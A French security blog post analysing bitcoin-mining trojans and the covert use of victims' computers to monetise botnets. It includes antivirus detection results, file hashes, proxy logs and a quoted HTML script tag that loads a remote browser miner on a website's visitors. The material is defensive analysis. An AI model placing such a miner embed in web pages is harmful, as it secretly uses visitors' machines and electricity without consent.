Trojan BitCoin : Monétisation de Botnet

Dans le billet précédent CyberGate @ Numericable, je parlais de « Pour monétiser, le botmaster a aussi installé un Trojan.Bitcoin que l’on retrouve souvent avec ces RAT. ».
Dans cette page nous parlerons donc des trojan bitcoin, c’est à dire de programmes malveillants (trojan, cheval de troie) qui visent à utiliser l’ordinateur, à l’insu du propriétaire, afin de générer des bitcoin ou autre crypto-monnaie.

Mais qu’est ce que BitCoin ?

Une des meilleurs définition : http://hack-it.org/index.php?title=Bitcoin :

Le minage permet de générer des bitcoins contre de la puissance de calcul (CPU, GPU, ATU, ...).
La puissance à fournir pour avoir un bitcoin grandit au fur et a mesure qu'ils sont générés, jusqu'a devenir impossible lorsqu'il y aura 21 Millions de BTC en circulation.

Pour une définition plus longue, se reporter à la page : http://bit-coin.fr/explication-concept-bitcoin/

Concrètement, Bitcoin est une monnaie virtuelle sur internet que l’on génère à partir de la CPU d’un ordinateur. Plus on génère de bitcoin plus la CPU requise pour en générer de nouveaux est importante.
Les Bitcoins peuvent servir à acheter des produits ou être échangés via des bureaux d’échanges contre de la vrai monnaie – dixit Wikipedia :

En date du 7 février 2011, vous pouviez acheter des Bitcoins à 1 Bitcoin = 0.88 $US soit 0.61 €. Par contre, il ne faut pas seulement regarder le taux de conversion, mais aussi tous les biens qu'il est possible d'obtenir

9,10

En date du 9 août 2011, la valeur du Bitcoin est de 5,36 €. En date du 11 août 2011, la valeur est de 7,05€.

D’autre part, Bitcoin permet de faire transiter de l’argent plus ou moins de manière anonyme, ce qui peux permettre de transférer des sommes entre Cybercriminal ou blanchir de l’argent.

Par la suite, de nouvelles monnaies virtuelles ont vu le jour, le principe est grosso modo identique.

Trojan Bitcoin

Comme vous le savez, les botnets servent à gagner de l’argent, soit via des campagnes de SPAM ou en louant le Botnet pour des attaques DDoS. Soit en installant des adwares pour ouvrir des popups de publicités ou en faisant installer des logiciels tiers et en touchant de l’argent via les PPI (exemple avec Offerbox).

Depuis Juin 2011, un nouveau système consiste à utiliser les ordinateurs du botnet et de les faire miner pour générer des bitcoins.

L’opération se fait en faisant tout simplement installer un programme qui va tourner en fond et utiliser la CPU de l’ordinateur infecté pour générer ces bitcoins.
La majorité de ces programmes sont assez bourrins et tournent à 100 de CPU ce qui est pas très discret, mais on peux imaginer par la suite des modules plus intelligent qui se calquent selon la puissance du CPU pour ne pas ralentir le PC.

Exemple de Trojan Bitcoin

Ci-dessus, on peut constater qu’un processus SystemMiner en .Net a été installé, ce dernier lance à son tour des processus bitcoin-miner.exe
Et plus bas un miner.exe qui est à fond la caisse au niveau CPU, ce dernier génère des bitcoins.

Trojan BitCoin : Monétisation de Botnet

Si l’on suspend miner.exe, ce sont les autres processus bitcoin-miner.exe qui prenne le relai pour utiliser la CPU et générer des bitcoins.
Trojan BitCoin : Monétisation de Botnet

Comme le montre ces captures et comme expliqué plus haut, ces miners ne sont pas très discrets puisqu’ils plombent la CPU et ralentissent l’ordinateur.
Exemple de détection d’un miner BitCoin :

File name: smona131594996965193399859
Submission date: 2011-09-13 21:45:01 (UTC)
Current status: finished
Result: 22 /43 (51.2%)	VT Community

Compact
Print results  Antivirus	Version	Last Update	Result
AhnLab-V3	2011.09.13.00	2011.09.13	Trojan/Win32.BitMiner
AntiVir	7.11.14.189	2011.09.13	SPR/Tool.BitCoinMiner.a.6
Antiy-AVL	2.0.3.7	2011.09.13	RiskTool/Win32.BitCoinMiner.gen
Avast	4.8.1351.0	2011.09.13	-
Avast5	5.0.677.0	2011.09.13	-
AVG	10.0.0.1190	2011.09.13	BitCoinMiner.A
BitDefender	7.2	2011.09.13	Application.BitCoinMiner.B
ByteHero	None	2011.09.13	-
CAT-QuickHeal	11.00	2011.09.13	-
ClamAV	0.97.0.0	2011.09.13	-
Commtouch	5.3.2.6	2011.09.13	-
Comodo	10102	2011.09.13	ApplicUnsaf.Win32.RiskTool.BitCoinMiner.A
DrWeb	5.0.2.03300	2011.09.13	Tool.BtcMine.2
Emsisoft	5.1.0.11	2011.09.13	Win32.SuspectCrc!IK
eSafe	7.0.17.0	2011.09.13	Win32.SPRTool.BitCoi
eTrust-Vet	36.1.8558	2011.09.13	-
F-Prot	4.6.2.117	2011.09.13	-
F-Secure	9.0.16440.0	2011.09.13	Application.BitCoinMiner.B
Fortinet	4.3.370.0	2011.09.11	HackerTool/BitCoinMiner
GData	22	2011.09.13	Application.BitCoinMiner.B
Ikarus	T3.1.1.107.0	2011.09.13	Win32.SuspectCrc
Jiangmin	13.0.900	2011.09.13	-
K7AntiVirus	9.112.5128	2011.09.13	Riskware
Kaspersky	9.0.0.837	2011.09.13	not-a-virus:RiskTool.Win32.BitCoinMiner.a
McAfee	5.400.0.1158	2011.09.13	Generic PUP.z!ga
McAfee-GW-Edition	2010.1D	2011.09.13	Generic PUP.z!ga
Microsoft	1.7604	2011.09.13	Program:Win32/CoinMiner
NOD32	6461	2011.09.13	a variant of Win32/BitCoinMiner
Norman	6.07.11	2011.09.13	-
nProtect	2011-09-13.01	2011.09.13	-
Panda	10.0.3.5	2011.09.13	-
PCTools	8.0.0.5	2011.09.13	-
Prevx	3.0	2011.09.13	-
Rising	23.74.03.03	2011.09.09	-
Sophos	4.69.0	2011.09.13	Bitcoin Miner
SUPERAntiSpyware	4.40.0.1006	2011.09.13	-
Symantec	20111.2.0.82	2011.09.13	-
TheHacker	6.7.0.1.293	2011.09.10	-
TrendMicro	9.500.0.1008	2011.09.13	-
TrendMicro-HouseCall	9.500.0.1008	2011.09.13	-
VBA32	3.12.16.4	2011.09.13	-
VIPRE	10466	2011.09.13	RiskTool.Win32.BitCoinMiner
ViRobot	2011.9.10.4666	2011.09.13	not-a-virus.RiskTool.Win32.BitCoinMiner.740352
Additional information
Show all
MD5   : 404fba79dc22aef44914498bfe3ba04f
SHA1  : e73acf50164d78c5c0102785a90c0618e2e53362
SHA256: bd51420383e3a71d6390c383b1d79ceefe4cb415d54d3a811e07b2371f025730

Autres exemples de Trojan Bitcoin

Si l’installation de BitCoin par des RAT/Cybergate est courante. On assiste aussi à une généralisation, certainement car cela fonctionne bien et que les contre pouvoir sont faibles (le temps de se mettre en place etc) et le fait que le système est décentralisé, ça ne doit pas aider.

Bref ce n’est certainement que le début.

Supprimer les trojan bitcoin

Vous trouverez des fichiers qui expliquent comment désinfecter votre ordinateur et supprimer les Trojan Bitcoin : http://www.supprimer-virus.com/?s=miner
Notamment parmis les plus répandus, on trouve : Claymore Bitcoin

EDIT Avril 2012 – BitCoin a travers  Java

Ce n’est pas la première fois que je tombe sur ce cas, je tiens tout de même à le signaler.

Vu sur un site pourri… Firefox qui tente de lancer un jar. Par habitude, on pense à un exploit qui se lance.


Mais aucun dropper à l’horizon… Java qui bourrine au niveau de la CPU.
Du côté des connexions, on peux voir :

TCP_MISS/200 843 GET http://www.bitcoinplus.com/api/work/getwork?a=32 - DIRECT/184.106.146.244 application/json
TCP_MISS/200 843 GET http://www.bitcoinplus.com/api/work/getwork?a=32 - DIRECT/184.106.146.244 application/json

Au final, donc un client bitcoin en Java.

Le site en question qui lance le client ne contient ‘un appel à un javascript qui se charge ensuite de lancer le JAR :

<script src="//www.bitcoinplus.com/js/miner.js" type="text/javascript"></script><script type="text/javascript">BitcoinPlusMiner(1202421)</script>

L’adresse du Jar : http://www.bitcoinplus.com/jar/bitcoinplus-miner.jar

Ce n’est pas le site officiel de bitcoin (http://bitcoin.org)

Avast! ne bloque pas le chargement du jar :

Le code n’est pas forcément malveillant et bitcoin.com ne distribue pas de virus informatiques puisqu’au final c’est un client bitcoin en java, ici ce qui pose problème, c’est plutôt l’utilisation qui en est faite.
Cela reste une utilisation du PC à l’insu de son propriétaire pour générer de l’argent (surtout que dans mon cas, les personnes doivent aussi être dans cybercriminalité « classique ») et en plus cela cause des ralentissements voire cela peux générer des plantages (et si le PC a un problème de refroidissement, cela peux causer des problèmes matériels).

Sur ce forum apparemment le webmaster a choisi cette méthode :
http://forum.gmod.biz/showthread.php?1540-Bitcoin-Mining
http://forum.gmod.biz/showthread.php?1576-Forum-java-application

Assez gênant !

EDIT – Juillet 2015 : Trojan Miner poussé par des PUPs/Adwares

Les PUPs/Adwares qui poussent des Troja Miner, voir la page : Quand les PUPs/Adwares abusent : Trojan Miner

EDIT – 22 Mai 2017 : Crypto-Monnaie et attaque MS17-010

Un edit de cette page autour des trojan bitcoin pour signaler que les ransomwares utilisent ce mode de paiement.
A tel point que lors de l’attaque de WannaCry, qui s’est aussi accompagné de pas mal de campagnes pour installer des trojan bitcoin.
Cela a peu jouer sur la valeur du bitcoin et faire gonfler artificiellement celle-ci.

Plusieurs exemple de campagnes de Trojan bitcoin : Wana Decryptor (aka WannaCry) et attaques MS17-010

EDIT – Septembre 2017 : le web miner ou miner depuis un site internet

Un nouvelle méthode qui devrait être de plus en plus utilisé, faire miner les visiteurs de sites internet.
Un JavaScript inclut sur les pages d’un site internet peut faire miner les ordinateurs des visiteurs.
Cela se traduit par l’augmentation de la charge CPU du navigateur internet

Plus d’informations : Les Web Miner : Minage de crypto-monnaie à partir des pages internet (JavaScript)

Print Friendly, PDF & Email
(Visité 828 fois, 2 visites ce jour)

Vous pouvez aussi lire...

Les Tags : #Windows10 - #Windows - #Tutoriel - #Virus - #Antivirus - #navigateurs WEB - #Securité - #Réseau - #Internet